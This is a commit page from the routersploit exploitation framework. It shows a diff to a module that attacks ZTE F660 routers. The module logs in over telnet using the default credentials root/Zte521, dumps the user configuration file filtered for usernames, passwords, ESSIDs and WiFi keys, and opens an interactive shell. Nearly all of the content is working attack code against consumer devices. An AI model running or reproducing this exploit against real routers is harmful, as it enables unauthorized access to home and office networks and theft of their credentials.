Skip to content

R
routersploit
Commit de458b9e by devilscream
Options

Fix exploits ZTE F660 Config Disclosure

parent 77e45081
Showing with 8 additions and 5 deletions
routersploit/modules/exploits/zte/f660_config_disclosure.py
...@@ -4,6 +4,7 @@ from routersploit import ( ...@@ -4,6 +4,7 @@ from routersploit import (
exploits, exploits,
print_success, print_success,
print_error, print_error,
mute
) )
...@@ -29,7 +30,7 @@ class Exploit(exploits.Exploit): ...@@ -29,7 +30,7 @@ class Exploit(exploits.Exploit):
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521 password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "cat /userconfig/cfg/db_user_cfg.xml" config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
def run(self): def run(self):
try: try:
...@@ -38,7 +39,6 @@ class Exploit(exploits.Exploit): ...@@ -38,7 +39,6 @@ class Exploit(exploits.Exploit):
tn.write(self.username + "\r\n") tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5) tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n") tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
...@@ -48,12 +48,14 @@ class Exploit(exploits.Exploit): ...@@ -48,12 +48,14 @@ class Exploit(exploits.Exploit):
if any(map(lambda x: x in res, ["#", "$", ">"])): if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication") print_success("Telnet - Successful authentication")
tn.write(self.config + "\r\n") tn.write(self.config + "\r\n")
tn.interact()
tn.close() tn.close()
except: except:
print_error("Connection Error") print_error("Connection Error")
return return
@mute
def check(self): def check(self):
try: try:
tn = telnetlib.Telnet(self.target, 23) tn = telnetlib.Telnet(self.target, 23)
...@@ -69,9 +71,10 @@ class Exploit(exploits.Exploit): ...@@ -69,9 +71,10 @@ class Exploit(exploits.Exploit):
if i != -1: if i != -1:
return False return False
else: else:
if any(map(lambda x: x in res, ["<DM name="])): if any(map(lambda x: x in res, ["#", "$", ">"])):
tn.close() if any(map(lambda x: x in res, ["<DM name="])):
return True tn.close()
return True
tn.close() tn.close()
except: except:
return False return False
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment